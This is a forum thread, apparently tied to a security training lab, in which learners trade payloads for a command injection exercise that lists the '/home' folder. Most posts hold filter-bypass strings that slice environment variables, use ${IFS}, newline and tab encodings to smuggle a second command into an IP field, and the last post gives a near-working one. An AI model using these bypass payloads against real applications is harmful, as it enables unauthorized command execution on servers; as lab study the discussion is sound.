Hey. I’ve been stuck with this question. " Use what you learned in this section to find name of the user in the ‘/home’ folder. What user did you find?"
I’ve tried some payloads like
127.0.0.1${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},$(tr ‘!-}’ ‘"-~’<<<.gnld)},
127.0.0.1${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},${PATH:0:5},
etc
but none of them works. It just returns something like this
I updated my payload to 127.0.0.1${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:5}
127.0.0.1${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}
But this is what I get so far. I need help.
I know that you’re supposed to use the $PATH variable because it makes the /. I’m stuck here also.
I used ip=127.0.0.1${LS_COLORS}${IFS}${PATH:0:1}${HOME}. It translates to ip=127.0.0.1; /HOME but its not working for me. I feel like something is missing. What does yours translate too?
Hi, I finally figured it out!
No need to use ${} for letters in the command.
Use it only for slashes and ;.
For spaces use the “space bypass tecnique” on the previous sections
Hi, assuming that you have found the correct request and parameter to inject, follow the indications I posted earlier.
For the command itself, take a look to <<< and subshell syntax like &{}, and don’t forget encoding.
I am not getting invalid input in the responses for the above, but no luck finding the username so i believe to be in the right path of solving it.
Can anyone give me a tip to solve it?
This one was annoying because it depends on you guessing 2 parts of the command correctly to get any results. For example, why would you intuit that the server would accept plaintext following the command to break the logic, especially when the segment you’re in details how to get arbitrary characters from bit shifting. Here’s a clue for those who are stuck: ip=127.0.0.1%0a${IFS}ls%09${PATH:0:1}home